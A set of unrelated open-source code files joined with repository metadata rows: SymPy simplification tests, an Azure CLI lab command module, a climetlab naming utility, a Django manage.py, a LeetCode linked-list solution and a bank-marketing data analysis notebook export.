assert radsimp(1/sqrt(5 + 2 * sqrt(6))) == -sqrt(2) + sqrt(3)
assert radsimp(1/sqrt(5 + 2 * sqrt(6))**3) == -(-sqrt(3) + sqrt(2))**3
# issue 6532
assert fraction(radsimp(1/sqrt(x))) == (sqrt(x), x)
assert fraction(radsimp(1/sqrt(2*x + 3))) == (sqrt(2*x + 3), 2*x + 3)
assert fraction(radsimp(1/sqrt(2*(x + 3)))) == (sqrt(2*x + 6), 2*x + 6)
# issue 5994
e = S('-(2 + 2*sqrt(2) + 4*2**(1/4))/'
'(1 + 2**(3/4) + 3*2**(1/4) + 3*sqrt(2))')
assert radsimp(e).expand() == -2*2**Rational(3, 4) - 2*2**Rational(1, 4) + 2 + 2*sqrt(2)
# issue 5986 (modifications to radimp didn't initially recognize this so
# the test is included here)
assert radsimp(1/(-sqrt(5)/2 - S.Half + (-sqrt(5)/2 - S.Half)**2)) == 1
# from issue 5934
eq = (
(-240*sqrt(2)*sqrt(sqrt(5) + 5)*sqrt(8*sqrt(5) + 40) -
360*sqrt(2)*sqrt(-8*sqrt(5) + 40)*sqrt(-sqrt(5) + 5) -
120*sqrt(10)*sqrt(-8*sqrt(5) + 40)*sqrt(-sqrt(5) + 5) +
120*sqrt(2)*sqrt(-sqrt(5) + 5)*sqrt(8*sqrt(5) + 40) +
120*sqrt(2)*sqrt(-8*sqrt(5) + 40)*sqrt(sqrt(5) + 5) +
120*sqrt(10)*sqrt(-sqrt(5) + 5)*sqrt(8*sqrt(5) + 40) +
120*sqrt(10)*sqrt(-8*sqrt(5) + 40)*sqrt(sqrt(5) + 5))/(-36000 -
7200*sqrt(5) + (12*sqrt(10)*sqrt(sqrt(5) + 5) +
24*sqrt(10)*sqrt(-sqrt(5) + 5))**2))
assert radsimp(eq) is S.NaN # it's 0/0
# work with normal form
e = 1/sqrt(sqrt(7)/7 + 2*sqrt(2) + 3*sqrt(3) + 5*sqrt(5)) + 3
assert radsimp(e) == (
-sqrt(sqrt(7) + 14*sqrt(2) + 21*sqrt(3) +
35*sqrt(5))*(-11654899*sqrt(35) - 1577436*sqrt(210) - 1278438*sqrt(15)
- 1346996*sqrt(10) + 1635060*sqrt(6) + 5709765 + 7539830*sqrt(14) +
8291415*sqrt(21))/1300423175 + 3)
# obey power rules
base = sqrt(3) - sqrt(2)
assert radsimp(1/base**3) == (sqrt(3) + sqrt(2))**3
assert radsimp(1/(-base)**3) == -(sqrt(2) + sqrt(3))**3
assert radsimp(1/(-base)**x) == (-base)**(-x)
assert radsimp(1/base**x) == (sqrt(2) + sqrt(3))**x
assert radsimp(root(1/(-1 - sqrt(2)), -x)) == (-1)**(-1/x)*(1 + sqrt(2))**(1/x)
# recurse
e = cos(1/(1 + sqrt(2)))
assert radsimp(e) == cos(-sqrt(2) + 1)
assert radsimp(e/2) == cos(-sqrt(2) + 1)/2
assert radsimp(1/e) == 1/cos(-sqrt(2) + 1)
assert radsimp(2/e) == 2/cos(-sqrt(2) + 1)
assert fraction(radsimp(e/sqrt(x))) == (sqrt(x)*cos(-sqrt(2)+1), x)
# test that symbolic denominators are not processed
r = 1 + sqrt(2)
assert radsimp(x/r, symbolic=False) == -x*(-sqrt(2) + 1)
assert radsimp(x/(y + r), symbolic=False) == x/(y + 1 + sqrt(2))
assert radsimp(x/(y + r)/r, symbolic=False) == \
-x*(-sqrt(2) + 1)/(y + 1 + sqrt(2))
# issue 7408
eq = sqrt(x)/sqrt(y)
assert radsimp(eq) == umul(sqrt(x), sqrt(y), 1/y)
assert radsimp(eq, symbolic=False) == eq
# issue 7498
assert radsimp(sqrt(x)/sqrt(y)**3) == umul(sqrt(x), sqrt(y**3), 1/y**3)
# for coverage
eq = sqrt(x)/y**2
assert radsimp(eq) == eq
def test_radsimp_issue_3214():
c, p = symbols('c p', positive=True)
s = sqrt(c**2 - p**2)
b = (c + I*p - s)/(c + I*p + s)
assert radsimp(b) == -I*(c + I*p - sqrt(c**2 - p**2))**2/(2*c*p)
def test_collect_1():
"""Collect with respect to a Symbol"""
x, y, z, n = symbols('x,y,z,n')
assert collect(1, x) == 1
assert collect( x + y*x, x ) == x * (1 + y)
assert collect( x + x**2, x ) == x + x**2
assert collect( x**2 + y*x**2, x ) == (x**2)*(1 + y)
assert collect( x**2 + y*x, x ) == x*y + x**2
assert collect( 2*x**2 + y*x**2 + 3*x*y, [x] ) == x**2*(2 + y) + 3*x*y
assert collect( 2*x**2 + y*x**2 + 3*x*y, [y] ) == 2*x**2 + y*(x**2 + 3*x)
assert collect( ((1 + y + x)**4).expand(), x) == ((1 + y)**4).expand() + \
x*(4*(1 + y)**3).expand() + x**2*(6*(1 + y)**2).expand() + \
x**3*(4*(1 + y)).expand() + x**4
# symbols can be given as any iterable
expr = x + y
assert collect(expr, expr.free_symbols) == expr
def test_collect_2():
"""Collect with respect to a sum"""
a, b, x = symbols('a,b,x')
assert collect(a*(cos(x) + sin(x)) + b*(cos(x) + sin(x)),
sin(x) + cos(x)) == (a + b)*(cos(x) + sin(x))
def test_collect_3():
"""Collect with respect to a product"""
a, b, c = symbols('a,b,c')
f = Function('f')
x, y, z, n = symbols('x,y,z,n')
assert collect(-x/8 + x*y, -x) == x*(y - Rational(1, 8))
assert collect( 1 + x*(y**2), x*y ) == 1 + x*(y**2)
assert collect( x*y + a*x*y, x*y) == x*y*(1 + a)
assert collect( 1 + x*y + a*x*y, x*y) == 1 + x*y*(1 + a)
assert collect(a*x*f(x) + b*(x*f(x)), x*f(x)) == x*(a + b)*f(x)
assert collect(a*x*log(x) + b*(x*log(x)), x*log(x)) == x*(a + b)*log(x)
assert collect(a*x**2*log(x)**2 + b*(x*log(x))**2, x*log(x)) == \
x**2*log(x)**2*(a + b)
# with respect to a product of three symbols
assert collect(y*x*z + a*x*y*z, x*y*z) == (1 + a)*x*y*z
def test_collect_4():
"""Collect with respect to a power"""
a, b, c, x = symbols('a,b,c,x')
assert collect(a*x**c + b*x**c, x**c) == x**c*(a + b)
# issue 6096: 2 stays with c (unless c is integer or x is positive0
assert collect(a*x**(2*c) + b*x**(2*c), x**c) == x**(2*c)*(a + b)
def test_collect_5():
"""Collect with respect to a tuple"""
a, x, y, z, n = symbols('a,x,y,z,n')
assert collect(x**2*y**4 + z*(x*y**2)**2 + z + a*z, [x*y**2, z]) in [
z*(1 + a + x**2*y**4) + x**2*y**4,
z*(1 + a) + x**2*y**4*(1 + z) ]
assert collect((1 + (x + y) + (x + y)**2).expand(),
[x, y]) == 1 + y + x*(1 + 2*y) + x**2 + y**2
def test_collect_pr19431():
"""Unevaluated collect with respect to a product"""
a = symbols('a')
assert collect(a**2*(a**2 + 1), a**2, evaluate=False)[a**2] == (a**2 + 1)
def test_collect_D():
D = Derivative
f = Function('f')
x, a, b = symbols('x,a,b')
fx = D(f(x), x)
fxx = D(f(x), x, x)
assert collect(a*fx + b*fx, fx) == (a + b)*fx
assert collect(a*D(fx, x) + b*D(fx, x), fx) == (a + b)*D(fx, x)
assert collect(a*fxx + b*fxx, fx) == (a + b)*D(fx, x)
# issue 4784
assert collect(5*f(x) + 3*fx, fx) == 5*f(x) + 3*fx
assert collect(f(x) + f(x)*diff(f(x), x) + x*diff(f(x), x)*f(x), f(x).diff(x)) == \
(x*f(x) + f(x))*D(f(x), x) + f(x)
assert collect(f(x) + f(x)*diff(f(x), x) + x*diff(f(x), x)*f(x), f(x).diff(x), exact=True) == \
(x*f(x) + f(x))*D(f(x), x) + f(x)
assert collect(1/f(x) + 1/f(x)*diff(f(x), x) + x*diff(f(x), x)/f(x), f(x).diff(x), exact=True) == \
(1/f(x) + x/f(x))*D(f(x), x) + 1/f(x)
e = (1 + x*fx + fx)/f(x)
assert collect(e.expand(), fx) == fx*(x/f(x) + 1/f(x)) + 1/f(x)
def test_collect_func():
f = ((x + a + 1)**3).expand()
assert collect(f, x) == a**3 + 3*a**2 + 3*a + x**3 + x**2*(3*a + 3) + \
x*(3*a**2 + 6*a + 3) + 1
assert collect(f, x, factor) == x**3 + 3*x**2*(a + 1) + 3*x*(a + 1)**2 + \
(a + 1)**3
assert collect(f, x, evaluate=False) == {
S.One: a**3 + 3*a**2 + 3*a + 1,
x: 3*a**2 + 6*a + 3, x**2: 3*a + 3,
x**3: 1
}
assert collect(f, x, factor, evaluate=False) == {
S.One: (a + 1)**3, x: 3*(a + 1)**2,
x**2: umul(S(3), a + 1), x**3: 1}
def test_collect_order():
a, b, x, t = symbols('a,b,x,t')
assert collect(t + t*x + t*x**2 + O(x**3), t) == t*(1 + x + x**2 + O(x**3))
assert collect(t + t*x + x**2 + O(x**3), t) == \
t*(1 + x + O(x**3)) + x**2 + O(x**3)
f = a*x + b*x + c*x**2 + d*x**2 + O(x**3)
g = x*(a + b) + x**2*(c + d) + O(x**3)
assert collect(f, x) == g
assert collect(f, x, distribute_order_term=False) == g
f = sin(a + b).series(b, 0, 10)
assert collect(f, [sin(a), cos(a)]) == \
sin(a)*cos(b).series(b, 0, 10) + cos(a)*sin(b).series(b, 0, 10)
assert collect(f, [sin(a), cos(a)], distribute_order_term=False) == \
sin(a)*cos(b).series(b, 0, 10).removeO() + \
cos(a)*sin(b).series(b, 0, 10).removeO() + O(b**10)
def test_rcollect():
assert rcollect((x**2*y + x*y + x + y)/(x + y), y) == \
(x + y*(1 + x + x**2))/(x + y)
assert rcollect(sqrt(-((x + 1)*(y + 1))), z) == sqrt(-((x + 1)*(y + 1)))
def test_collect_D_0():
D = Derivative
f = Function('f')
x, a, b = symbols('x,a,b')
fxx = D(f(x), x, x)
assert collect(a*fxx + b*fxx, fxx) == (a + b)*fxx
def test_collect_Wild():
"""Collect with respect to functions with Wild argument"""
a, b, x, y = symbols('a b x y')
f = Function('f')
w1 = Wild('.1')
w2 = Wild('.2')
assert collect(f(x) + a*f(x), f(w1)) == (1 + a)*f(x)
assert collect(f(x, y) + a*f(x, y), f(w1)) == f(x, y) + a*f(x, y)
assert collect(f(x, y) + a*f(x, y), f(w1, w2)) == (1 + a)*f(x, y)
assert collect(f(x, y) + a*f(x, y), f(w1, w1)) == f(x, y) + a*f(x, y)
assert collect(f(x, x) + a*f(x, x), f(w1, w1)) == (1 + a)*f(x, x)
assert collect(a*(x + 1)**y + (x + 1)**y, w1**y) == (1 + a)*(x + 1)**y
assert collect(a*(x + 1)**y + (x + 1)**y, w1**b) == \
a*(x + 1)**y + (x + 1)**y
assert collect(a*(x + 1)**y + (x + 1)**y, (x + 1)**w2) == \
(1 + a)*(x + 1)**y
assert collect(a*(x + 1)**y + (x + 1)**y, w1**w2) == (1 + a)*(x + 1)**y
def test_collect_const():
# coverage not provided by above tests
assert collect_const(2*sqrt(3) + 4*a*sqrt(5)) == \
2*(2*sqrt(5)*a + sqrt(3)) # let the primitive reabsorb
assert collect_const(2*sqrt(3) + 4*a*sqrt(5), sqrt(3)) == \
2*sqrt(3) + 4*a*sqrt(5)
assert collect_const(sqrt(2)*(1 + sqrt(2)) + sqrt(3) + x*sqrt(2)) == \
sqrt(2)*(x + 1 + sqrt(2)) + sqrt(3)
# issue 5290
assert collect_const(2*x + 2*y + 1, 2) == \
collect_const(2*x + 2*y + 1) == \
Add(S.One, Mul(2, x + y, evaluate=False), evaluate=False)
assert collect_const(-y - z) == Mul(-1, y + z, evaluate=False)
assert collect_const(2*x - 2*y - 2*z, 2) == \
Mul(2, x - y - z, evaluate=False)
assert collect_const(2*x - 2*y - 2*z, -2) == \
_unevaluated_Add(2*x, Mul(-2, y + z, evaluate=False))
# this is why the content_primitive is used
eq = (sqrt(15 + 5*sqrt(2))*x + sqrt(3 + sqrt(2))*y)*2
assert collect_sqrt(eq + 2) == \
2*sqrt(sqrt(2) + 3)*(sqrt(5)*x + y) + 2
# issue 16296
assert collect_const(a + b + x/2 + y/2) == a + b + Mul(S.Half, x + y, evaluate=False)
def test_issue_13143():
f = Function('f')
fx = f(x).diff(x)
e = f(x) + fx + f(x)*fx
# collect function before derivative
assert collect(e, Wild('w')) == f(x)*(fx + 1) + fx
e = f(x) + f(x)*fx + x*fx*f(x)
assert collect(e, fx) == (x*f(x) + f(x))*fx + f(x)
assert collect(e, f(x)) == (x*fx + fx + 1)*f(x)
e = f(x) + fx + f(x)*fx
assert collect(e, [f(x), fx]) == f(x)*(1 + fx) + fx
assert collect(e, [fx, f(x)]) == fx*(1 + f(x)) + f(x)
def test_issue_6097():
assert collect(a*y**(2.0*x) + b*y**(2.0*x), y**x) == (a + b)*(y**x)**2.0
assert collect(a*2**(2.0*x) + b*2**(2.0*x), 2**x) == (a + b)*(2**x)**2.0
def test_fraction_expand():
eq = (x + y)*y/x
assert eq.expand(frac=True) == fraction_expand(eq) == (x*y + y**2)/x
assert eq.expand() == y + y**2/x
def test_fraction():
x, y, z = map(Symbol, 'xyz')
A = Symbol('A', commutative=False)
assert fraction(S.Half) == (1, 2)
assert fraction(x) == (x, 1)
assert fraction(1/x) == (1, x)
assert fraction(x/y) == (x, y)
assert fraction(x/2) == (x, 2)
assert fraction(x*y/z) == (x*y, z)
assert fraction(x/(y*z)) == (x, y*z)
assert fraction(1/y**2) == (1, y**2)
assert fraction(x/y**2) == (x, y**2)
assert fraction((x**2 + 1)/y) == (x**2 + 1, y)
assert fraction(x*(y + 1)/y**7) == (x*(y + 1), y**7)
assert fraction(exp(-x), exact=True) == (exp(-x), 1)
assert fraction((1/(x + y))/2, exact=True) == (1, Mul(2,(x + y), evaluate=False))
assert fraction(x*A/y) == (x*A, y)
assert fraction(x*A**-1/y) == (x*A**-1, y)
n = symbols('n', negative=True)
assert fraction(exp(n)) == (1, exp(-n))
assert fraction(exp(-n)) == (exp(-n), 1)
p = symbols('p', positive=True)
assert fraction(exp(-p)*log(p), exact=True) == (exp(-p)*log(p), 1)
def test_issue_5615():
aA, Re, a, b, D = symbols('aA Re a b D')
e = ((D**3*a + b*aA**3)/Re).expand()
assert collect(e, [aA**3/Re, a]) == e
def test_issue_5933():
from sympy import Polygon, RegularPolygon, denom
x = Polygon(*RegularPolygon((0, 0), 1, 5).vertices).centroid.x
assert abs(denom(x).n()) > 1e-12
assert abs(denom(radsimp(x))) > 1e-12 # in case simplify didn't handle it
def test_issue_14608():
a, b = symbols('a b', commutative=False)
x, y = symbols('x y')
raises(AttributeError, lambda: collect(a*b + b*a, a))
assert collect(x*y + y*(x+1), a) == x*y + y*(x+1)
assert collect(x*y + y*(x+1) + a*b + b*a, y) == y*(2*x + 1) + a*b + b*a
def test_collect_abs():
s = abs(x) + abs(y)
assert collect_abs(s) == s
assert unchanged(Mul, abs(x), abs(y))
ans = Abs(x*y)
assert isinstance(ans, Abs)
assert collect_abs(abs(x)*abs(y)) == ans
assert collect_abs(1 + exp(abs(x)*abs(y))) == 1 + exp(ans)
# See https://github.com/sympy/sympy/issues/12910
p = Symbol('p', positive=True)
assert collect_abs(p/abs(1-p)).is_commutative is True
def test_issue_19149():
eq = exp(3*x/4)
assert collect(eq, exp(x)) == eq
| 37.92053 | 103 | 0.493946 |
7a5516fd96fc5cff46aadcb216523028d5d9b37f | 5,041 | py | Python | src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/commands.py | saurabsa/azure-cli-old | f77477a98c9aa9cb55daf5b0d2f410d1455a9225 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/commands.py | saurabsa/azure-cli-old | f77477a98c9aa9cb55daf5b0d2f410d1455a9225 | [
"MIT"
] | null | null | null | src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/commands.py | saurabsa/azure-cli-old | f77477a98c9aa9cb55daf5b0d2f410d1455a9225 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from ._client_factory import (get_devtestlabs_virtual_machine_operation,
get_devtestlabs_custom_image_operation,
get_devtestlabs_gallery_image_operation,
get_devtestlabs_artifact_operation,
get_devtestlabs_artifact_source_operation,
get_devtestlabs_lab_operation,
get_devtestlabs_virtual_network_operation,
get_devtestlabs_formula_operation)
from azure.cli.core.sdk.util import (ServiceGroup, create_service_adapter)
custom_path = 'azure.cli.command_modules.lab.custom'
mgmt_operations_path = 'azure.cli.command_modules.lab.sdk.devtestlabs.operations.{}'
# Custom Command's service adapter
custom_operations = create_service_adapter(custom_path)
# Virtual Machine Operations Commands
virtual_machine_operations = create_service_adapter(
mgmt_operations_path.format('virtual_machine_operations'),
'VirtualMachineOperations')
with ServiceGroup(__name__, get_devtestlabs_virtual_machine_operation,
virtual_machine_operations) as s:
with s.group('lab vm') as c:
c.command('show', 'get_resource')
c.command('list', 'list')
c.command('delete', 'delete_resource')
c.command('start', 'start')
c.command('stop', 'stop')
c.command('apply-artifacts', 'apply_artifacts')
# Virtual Machine Operations Custom Commands
with ServiceGroup(__name__, get_devtestlabs_virtual_machine_operation,
custom_operations) as s:
with s.group('lab vm') as c:
c.command('list', 'list_vm')
# Lab Operations Custom Commands
with ServiceGroup(__name__, get_devtestlabs_lab_operation,
custom_operations) as s:
with s.group('lab vm') as c:
c.command('create', 'create_lab_vm')
lab_operations = create_service_adapter(mgmt_operations_path.format('lab_operations'),
'LabOperations')
# Lab Operations Commands
with ServiceGroup(__name__, get_devtestlabs_lab_operation,
lab_operations) as s:
with s.group('lab') as c:
c.command('get', 'get_resource')
# Custom Image Operations Commands
custom_image_operations = create_service_adapter(
mgmt_operations_path.format('custom_image_operations'),
'CustomImageOperations')
with ServiceGroup(__name__, get_devtestlabs_custom_image_operation,
custom_image_operations) as s:
with s.group('lab custom-image') as c:
c.command('show', 'get_resource')
c.command('list', 'list')
c.command('delete', 'delete_resource')
# Gallery Image Operations Commands
gallery_image_operations = create_service_adapter(
mgmt_operations_path.format('gallery_image_operations'),
'GalleryImageOperations')
with ServiceGroup(__name__, get_devtestlabs_gallery_image_operation,
gallery_image_operations) as s:
with s.group('lab gallery-image') as c:
c.command('list', 'list')
# Artifact Operations Commands
artifact_operations = create_service_adapter(
mgmt_operations_path.format('artifact_operations'),
'ArtifactOperations')
with ServiceGroup(__name__, get_devtestlabs_artifact_operation,
artifact_operations) as s:
with s.group('lab artifact') as c:
c.command('list', 'list')
# Artifact Source Operations Commands
artifact_source_operations = create_service_adapter(
mgmt_operations_path.format('artifact_source_operations'),
'ArtifactSourceOperations')
with ServiceGroup(__name__, get_devtestlabs_artifact_source_operation,
artifact_source_operations) as s:
with s.group('lab artifact-source') as c:
c.command('list', 'list')
c.command('get', 'get_resource')
# Virtual Network Operations Commands
virtual_network_operations = create_service_adapter(
mgmt_operations_path.format('virtual_network_operations'),
'VirtualNetworkOperations')
with ServiceGroup(__name__, get_devtestlabs_virtual_network_operation,
virtual_network_operations) as s:
with s.group('lab vnet') as c:
c.command('list', 'list')
c.command('get', 'get_resource')
# Formula Operations Commands
formula_operations = create_service_adapter(
mgmt_operations_path.format('formula_operations'),
'FormulaOperations')
with ServiceGroup(__name__, get_devtestlabs_formula_operation,
formula_operations) as s:
with s.group('lab formula') as c:
c.command('get', 'get_resource')
c.command('list', 'list')
c.command('delete', 'delete_resource')
| 40.328 | 94 | 0.677048 |
eb1bb085bf9629b4e7e1aa8eec163a1199c1829f | 1,583 | py | Python | climetlab/utils/conventions.py | mikewcasale/climetlab | 924aa602dcd638ff1a49a9d8b4b6f7bd29361d1e | [
"Apache-2.0"
] | 3 | 2021-07-23T02:06:08.000Z | 2022-02-15T01:17:15.000Z | climetlab/utils/conventions.py | mikewcasale/climetlab | 924aa602dcd638ff1a49a9d8b4b6f7bd29361d1e | [
"Apache-2.0"
] | null | null | null | climetlab/utils/conventions.py | mikewcasale/climetlab | 924aa602dcd638ff1a49a9d8b4b6f7bd29361d1e | [
"Apache-2.0"
] | 2 | 2021-11-02T13:19:48.000Z | 2021-12-29T08:38:45.000Z | # (C) Copyright 2021 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
import logging
import os
import re
from collections import defaultdict
import yaml
from climetlab.decorators import locked
ALIASES = {}
CONVENTIONS = defaultdict(dict)
SEP = "@"
@locked
def get_alias_and_conventions():
"""fill the global variable from the relevant yaml file"""
if ALIASES:
return ALIASES, CONVENTIONS
path = os.path.join(os.path.dirname(__file__), "conventions.yaml")
with open(path) as f:
mappings = yaml.load(f.read(), Loader=yaml.SafeLoader)["parameter_name"]
def split_mapping(key):
m = re.match(f"([^{SEP}]*){SEP}(.*)", key)
if not m:
return None, key
return m.groups()
for i, m in enumerate(mappings):
for conv_key in m:
convention, key = split_mapping(conv_key)
if convention:
CONVENTIONS[convention][i] = key
ALIASES[key] = i
return ALIASES, CONVENTIONS
def normalise_string(key, convention="cf"):
aliases, conventions = get_alias_and_conventions()
i = aliases.get(key, key)
c = conventions[convention]
new = c.get(i, key)
logging.debug(f"Normalising '{key}' into '{new}' ({c} convention)")
return new
| 27.293103 | 80 | 0.669615 |
245ff6078f22a05c134f71cf0d3438bc645d3d5b | 537 | py | Python | seend/manage.py | kelvinndmo/seend | 5a6117cd65c2f20a99a02f0c3176e607cad56b5a | [
"MIT"
] | null | null | null | seend/manage.py | kelvinndmo/seend | 5a6117cd65c2f20a99a02f0c3176e607cad56b5a | [
"MIT"
] | 5 | 2019-02-18T15:44:37.000Z | 2019-02-22T07:13:40.000Z | seend/manage.py | kelvinndmo/seend | 5a6117cd65c2f20a99a02f0c3176e607cad56b5a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'seend.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| 33.5625 | 73 | 0.685289 |
db97bbe413ba1220afc275d839b7037e93b8c10f | 1,511 | py | Python | #25 Reverse Nodes in k-Group.py | medisean/leetcode | f218fb738fb2b57f5eea3795a0a02cf495561465 | [
"MIT"
] | null | null | null | #25 Reverse Nodes in k-Group.py | medisean/leetcode | f218fb738fb2b57f5eea3795a0a02cf495561465 | [
"MIT"
] | null | null | null | #25 Reverse Nodes in k-Group.py | medisean/leetcode | f218fb738fb2b57f5eea3795a0a02cf495561465 | [
"MIT"
] | null | null | null | '''
Given a linked list, reverse the nodes of a linked list k at a time and return its modified list.
k is a positive integer and is less than or equal to the length of the linked list. If the number of nodes is not a multiple of k then left-out nodes in the end should remain as it is.
Example:
Given this linked list: 1->2->3->4->5
For k = 2, you should return: 2->1->4->3->5
For k = 3, you should return: 3->2->1->4->5
Note:
Only constant extra memory is allowed.
You may not alter the values in the list's nodes, only nodes itself may be changed.
'''
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def PrintSelf(self):
p = self
while p != None:
print(p.val, "-->")
p = p.next
class Solution:
def reverseKGroup(self, head: ListNode, k: int) -> ListNode:
if k == 0:
return head
nodes = []
p = head
while p != None:
nodes.append(p)
p = p.next
for i in range(int(len(nodes)/k)):
for j in range(0, int(k/2)):
nodes[i * k + j].val, nodes[(i + 1) * k - j - 1].val = nodes[(i + 1) * k - j - 1].val, nodes[i * k + j].val
return head
if __name__ == '__main__':
l1 = ListNode(1)
l2 = ListNode(2)
l3 = ListNode(3)
l4 = ListNode(4)
l5 = ListNode(5)
l1.next = l2
l2.next = l3
l3.next = l4
l4.next = l5
solution = Solution()
solution.reverseKGroup(l1, 2).PrintSelf() | 27.472727 | 184 | 0.566512 |
90b22aa706928b2a9d26a94f7438aa8d08c9bb29 | 5,952 | py | Python | Bank.py | varundinesh/awesome-project-ideas | ed732f9a03b3ed58fbd13257b25ddf508fd6d3cb | [
"MIT"
] | null | null | null | Bank.py | varundinesh/awesome-project-ideas | ed732f9a03b3ed58fbd13257b25ddf508fd6d3cb | [
"MIT"
] | null | null | null | Bank.py | varundinesh/awesome-project-ideas | ed732f9a03b3ed58fbd13257b25ddf508fd6d3cb | [
"MIT"
] | null | null | null |
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
data=pd.read_csv('F:\\bank-additional-full.csv',sep=';')
# In[2]:
data.shape
# In[3]:
tot=len(set(data.index))
last=data.shape[0]-tot
last
# In[4]:
data.isnull().sum()
# In[5]:
print(data.y.value_counts())
sns.countplot(x='y', data=data)
plt.show()
# In[6]:
cat=data.select_dtypes(include=['object']).columns
cat
# In[7]:
for c in cat:
print(c)
print("-"*50)
print(data[c].value_counts())
print("-"*50)
# In[8]:
from sklearn.preprocessing import LabelEncoder,OneHotEncoder
le=LabelEncoder()
data['y']=le.fit_transform(data['y'])
# In[9]:
data.drop('poutcome',axis=1,inplace=True)
# In[10]:
print( data['age'].quantile(q = 0.75) +
1.5*(data['age'].quantile(q = 0.75) - data['age'].quantile(q = 0.25)))
# In[11]:
data['age']=data[data['age']<69.6]
data['age'].fillna(int(data['age'].mean()),inplace=True)
# In[12]:
data['age'].values
# In[13]:
data[['age','y']].groupby(['age'],as_index=False).mean().sort_values(by='y', ascending=False)
# In[14]:
# for x in data:
# x['Sex'] = x['Sex'].map( {'female': 1, 'male': 0}).astype(int)
# In[15]:
data['age_slice'] = pd.cut(data['age'],5)
data[['age_slice', 'y']].groupby(['age_slice'], as_index=False).mean().sort_values(by='age_slice', ascending=True)
# In[16]:
data['age'] = data['age'].astype(int)
data.loc[(data['age'] >= 16) & (data['age'] <= 28), 'age'] = 1
data.loc[(data['age'] > 28) & (data['age'] <= 38), 'age'] = 2
data.loc[(data['age'] > 38) & (data['age'] <= 49), 'age'] = 3
data.loc[ (data['age'] > 49) & (data['age'] <= 59), 'age'] = 4
data.loc[ (data['age'] > 59 )& (data['age'] <= 69), 'age'] = 5
# In[17]:
data.drop('age_slice',axis=1,inplace=True)
# In[18]:
data['marital'].replace(['divorced' ,'married' , 'unknown' , 'single'] ,['single','married','unknown','single'], inplace=True)
# In[19]:
data['marital']=le.fit_transform(data['marital'])
# In[20]:
data
# In[21]:
data['job'].replace(['student'] ,['unemployed'], inplace=True)
# In[22]:
data[['education', 'y']].groupby(['education'], as_index=False).mean().sort_values(by='education', ascending=True)
# In[23]:
fig, ax = plt.subplots()
fig.set_size_inches(20, 5)
sns.countplot(x = 'education', hue = 'loan', data = data)
ax.set_xlabel('Education', fontsize=15)
ax.set_ylabel('y', fontsize=15)
ax.set_title('Education Count Distribution', fontsize=15)
ax.tick_params(labelsize=15)
sns.despine()
# In[24]:
fig, ax = plt.subplots()
fig.set_size_inches(20, 5)
sns.countplot(x = 'job', hue = 'loan', data = data)
ax.set_xlabel('job', fontsize=17)
ax.set_ylabel('y', fontsize=17)
ax.set_title('Education Count Distribution', fontsize=17)
ax.tick_params(labelsize=17)
sns.despine()
# In[25]:
data['education'].replace(['basic.4y','basic.6y','basic.9y','professional.course'] ,['not_reach_highschool','not_reach_highschool','not_reach_highschool','university.degree'], inplace=True)
# In[26]:
ohe=OneHotEncoder()
data['default']=le.fit_transform(data['default'])
data['housing']=le.fit_transform(data['housing'])
data['loan']=le.fit_transform(data['loan'])
data['month']=le.fit_transform(data['month'])
ohe=OneHotEncoder(categorical_features=data['month'])
data['contact']=le.fit_transform(data['contact'])
data['day_of_week']=le.fit_transform(data['day_of_week'])
data['job']=le.fit_transform(data['job'])
data['education']=le.fit_transform(data['education'])
# In[27]:
cat=data.select_dtypes(include=['object']).columns
cat
# In[28]:
def outlier_detect(data,feature):
q1 = data[feature].quantile(0.25)
q3 = data[feature].quantile(0.75)
iqr = q3-q1 #Interquartile range
lower = q1-1.5*iqr
upper = q3+1.5*iqr
data = data.loc[(data[feature] > lower) & (data[feature] < upper)]
print('lower IQR and upper IQR of',feature,"are:", lower, 'and', upper, 'respectively')
return data
# In[29]:
data.columns
# In[30]:
data['pdays'].unique()
# In[31]:
data['pdays'].replace([999] ,[0], inplace=True)
# In[32]:
data['previous'].unique()
# In[33]:
fig, ax = plt.subplots()
fig.set_size_inches(15, 5)
sns.countplot(x = 'campaign', palette="rocket", data = data)
ax.set_xlabel('campaign', fontsize=25)
ax.set_ylabel('y', fontsize=25)
ax.set_title('campaign', fontsize=25)
sns.despine()
# In[34]:
sns.countplot(x = 'pdays', palette="rocket", data = data)
ax.set_xlabel('pdays', fontsize=25)
ax.set_ylabel('y', fontsize=25)
ax.set_title('pdays', fontsize=25)
sns.despine()
# In[35]:
data[['pdays', 'y']].groupby(['pdays'], as_index=False).mean().sort_values(by='pdays', ascending=True)
# In[36]:
sns.countplot(x = 'emp.var.rate', palette="rocket", data = data)
ax.set_xlabel('emp.var.rate', fontsize=25)
ax.set_ylabel('y', fontsize=25)
ax.set_title('emp.var.rate', fontsize=25)
sns.despine()
# In[37]:
outlier_detect(data,'duration')
#outlier_detect(data,'emp.var.rate')
outlier_detect(data,'nr.employed')
#outlier_detect(data,'euribor3m')
# In[38]:
X = data.iloc[:,:-1]
X = X.values
y = data['y'].values
# In[39]:
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
# In[40]:
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
# In[ ]:
algo = {'LR': LogisticRegression(),
'DT':DecisionTreeClassifier(),
'RFC':RandomForestClassifier(n_estimators=100),
'SVM':SVC(gamma=0.01),
'KNN':KNeighborsClassifier(n_neighbors=10)
}
